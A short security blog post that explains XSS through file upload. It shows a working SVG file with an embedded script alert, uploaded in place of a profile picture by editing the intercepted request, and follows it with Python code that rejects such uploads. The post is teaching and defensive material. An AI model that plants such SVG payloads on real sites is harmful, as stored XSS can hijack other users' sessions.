I'll be talking about file upload vulnerabilities in this blog.
Most applications provide a function for uploading files. However, this feature is implemented in a variety of ways depending on the application's use case. While some programs only allow uploading a profile photo and accept only image-related extensions, others, depending on their business case, accept other extensions.
XSS Via File Upload:-
There are several ways to carry out a cross-site scripting attack scenario while testing the file upload capability. File upload is a major opportunity to discover cross-site scripting (XSS) in a web application.
These are a few techniques for XSS via file upload.
2. XSS via Metadata
3. XSS via SVG file
4. SVG-based blind XSS
Now let's start.
I have a website, www.Example.com, where a user can upload any file in the profile picture section.
Add a normal picture to the profile, capture the request, and change the original metadata to SVG code.
HERE'S THE SVG CODE:-
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("Maxx IS here");
</script>
</svg>
Now the code has been executed.
THE POPUP IS HERE💣💥
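On the defending side, the upload handler can catch this by deciding from the file's bytes instead of the Content-Type or extension the client sent. The Python below is an added example, not code from the tested site; the function names and the PNG/JPEG/GIF allow-list are assumptions for a profile-picture endpoint.

```python
import xml.etree.ElementTree as ET

# Assumed allow-list for a profile picture: raster formats, keyed by magic bytes.
RASTER_MAGIC = {b"\x89PNG\r\n\x1a\n": "image/png", b"\xff\xd8\xff": "image/jpeg",
                b"GIF87a": "image/gif", b"GIF89a": "image/gif"}

def sniff_raster(data: bytes):
    """Return the MIME type implied by the leading bytes, or None."""
    for magic, mime in RASTER_MAGIC.items():
        if data.startswith(magic):
            return mime
    return None

def svg_active_content(data: bytes):
    """List script-capable constructs in an SVG/XML body (for logging/triage)."""
    findings = []
    try:
        root = ET.fromstring(data)  # in production prefer a hardened parser (defusedxml)
    except ET.ParseError:
        return findings
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1].lower()  # drop the XML namespace
        if tag in ("script", "foreignobject"):
            findings.append(f"<{tag}> element")
        for name, value in el.attrib.items():
            attr = name.rsplit("}", 1)[-1].lower()
            if attr.startswith("on"):
                findings.append(f"{attr} handler on <{tag}>")
            elif attr == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: href on <{tag}>")
    return findings

def check_profile_upload(declared_type: str, data: bytes):
    """Accept only when the bytes are an allowed raster image matching the declared type."""
    sniffed = sniff_raster(data)
    if sniffed is None:
        return False, ["not an allowed raster image"] + svg_active_content(data)
    if sniffed != declared_type:
        return False, [f"declared {declared_type}, content is {sniffed}"]
    return True, []

# Constructed sample: a trimmed form of the post's SVG body, still sent as image/png.
SVG_BODY = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("Maxx IS here");</script>
</svg>"""

print(check_profile_upload("image/png", SVG_BODY))
```

If the application does need to accept SVG, serving uploads from a separate origin with `Content-Disposition: attachment` keeps any embedded script from running in the site's context.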
Further Reads:
https://hackerone.com/reports/880099
Happy hacking!
Have fun learning, everyone!